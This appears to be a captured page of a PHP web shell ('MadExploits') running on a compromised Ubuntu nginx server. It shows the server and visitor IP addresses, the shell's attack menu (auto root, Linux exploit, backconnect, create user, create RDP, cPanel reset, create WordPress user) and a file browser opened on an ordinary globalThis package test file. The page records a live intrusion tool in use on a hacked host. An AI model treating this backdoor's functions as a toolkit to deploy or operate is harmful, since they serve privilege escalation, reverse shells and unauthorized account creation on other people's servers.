Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
globalthis /
test /
[ HOME SHELL ]
Name
Size
Permission
Action
implementation.js
213
B
-rw-rw-rw-
index.js
196
B
-rw-rw-rw-
native.js
767
B
-rw-rw-rw-
shimmed.js
900
B
-rw-rw-rw-
tests.js
1.37
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : native.js
'use strict'; var test = require('tape'); var defineProperties = require('define-properties'); var isEnumerable = Object.prototype.propertyIsEnumerable; var missing = {}; var theGlobal = typeof globalThis === 'object' ? globalThis : missing; var runTests = require('./tests'); test('native', { todo: theGlobal === missing }, function (t) { if (theGlobal !== missing) { t.equal(typeof theGlobal, 'object', 'globalThis is an object'); t.equal('globalThis' in theGlobal, true, 'globalThis is in globalThis'); t.test('enumerability', { skip: !defineProperties.supportsDescriptors }, function (et) { et.equal(false, isEnumerable.call(theGlobal, 'globalThis'), 'globalThis is not enumerable'); et.end(); }); runTests(theGlobal, t); } t.end(); });
Close